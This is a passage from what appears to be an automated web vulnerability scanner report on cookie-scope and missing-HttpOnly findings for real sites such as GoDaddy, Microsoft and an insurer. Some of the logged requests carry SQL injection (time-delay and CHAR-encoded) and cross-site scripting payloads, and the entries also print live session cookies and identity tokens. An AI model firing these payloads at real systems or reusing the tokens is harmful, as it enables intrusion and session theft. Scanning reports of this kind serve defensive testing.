Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
14.27. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
14.28. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
14.29. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
14.30. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
14.31. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofttranslator.com
Path:   /Ajax/V2/Widget.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Ajax/V2/Widget.aspx?siteData=ncUzpG6DNC3ChU0huEHZCFQbqrzCQRcTVqXdHso8P2KRGM-oFXjoeYwum3D31voFEyqUPj4HjacfvEdrHEyIG8CuATkNhQmRwcZkpGVFjvVnLd1gzFP2dxWEWKdcQtE1&mode=manual&from=en&layout=ts HTTP/1.1
Host: www.microsofttranslator.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=7F6843DC4FE646E9AE270E4CF6963799; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; mstcid=352bfb89; OrigMUID=9C83C8B83DCB480D9837E32DFFAAD691%2c0db7ff218e994793a68b44ecaf2f4b7b; ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; SRCHD=MS=1679828&D=1644355&AF=NOFORM; MUID=9C83C8B83DCB480D9837E32DFFAAD691&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=43200
Content-Type: application/x-javascript; charset=utf-8
X-MS-Trans-Info: s=3640
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:43:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; expires=Sun, 02-Mar-2110 02:43:39 GMT; path=/
Set-Cookie: _SS=SID=2DCF47CF4267419084C3BBA97B070558; domain=.microsofttranslator.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.microsofttranslator.com; path=/
Set-Cookie: SRCHD=MS=1699303&D=1644355&AF=NOFORM; expires=Mon, 25-Mar-2013 01:43:39 GMT; domain=.microsofttranslator.com; path=/
Content-Length: 107103

.../* Copyright 2010 Microsoft Corporation */
window['_mstConfig']={appId:'Tz_-tnqAcnp2s1WSWyaNFegugm2Qb8N4bWuf0eVdHNneSXxazIr6VlZ0pl6zQr-i2',baseURL:'http://www.microsofttranslator.com/Ajax/V2/Widge
...[SNIP]...
15. Cookie without HttpOnly flag set  previous  next
There are 200 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

15.1. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&cs=1&ti=Microsoft%20Trademarks&si=1&sv=4.0&fi=1&fv=10.2&r=http%3A%2F%2Fwww.microsoft.com%2Flibrary%2Ftoolbar%2F3.0%2Ftrademarks%2Fen-us.mspx&ts=1301101086935&sr=1920x1200&bs=1410x15089 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=603b4bae-c040-4de3-9137-6b3b928992ac&Microsoft.CreationDate=03/26/2011 00:57:21&Microsoft.LastVisitDate=03/26/2011 00:58:51&Microsoft.NumberOfVisits=2&SessionCookie.Id=D4A72B621B01025B4D713B5DF725DB36; domain=microsoft.com; expires=Sat, 26-Mar-2011 01:28:51 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:58:51&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; domain=microsoft.com; expires=Sun, 25-Mar-2012 00:58:51 GMT; path=/
Set-Cookie: MS0=38ceddfa393547488a60161c1088230a; domain=.microsoft.com; expires=Sat, 26-Mar-2011 01:28:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:51 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
15.2. http://hbc.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hbc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Wed, 30 Mar 2011 13:51:52 GMT
X-Powered-By: ASP.NET
Location: http://www.hbc.com/landing.html
Content-Length: 152
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRQCATS=DEEPHEBCOGNPGBIILILIKEHP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.hbc.com/landing.html">here</a>.</body>
15.3. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/PaymentDetails.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /billing_view/PaymentDetails.asp?id=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Host: hmficweb.hinghammutual.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:12:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1584
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQDDBBBA=BGAPHEHCPIKOJFKCINJLDINK; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - View Payment Details</TITLE>
</
...[SNIP]...
15.4. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/PaymentDetails.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /billing_view/PaymentDetails.asp?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Host: hmficweb.hinghammutual.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 26 Mar 2011 12:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 733
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCBBBAA=KKFFOKOCHHEPGHNPBIGNGGCI; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - View Payment Details</TITLE>
</
...[SNIP]...
15.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:11 GMT
Expires: Thu, 31 Mar 2011 00:53:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQARDDCAB=DFKLDCFBODGPMEKIJBAHJEDF; path=/
X-Powered-By: ASP.NET
Content-Length: 738
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152,
...[SNIP]...
15.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

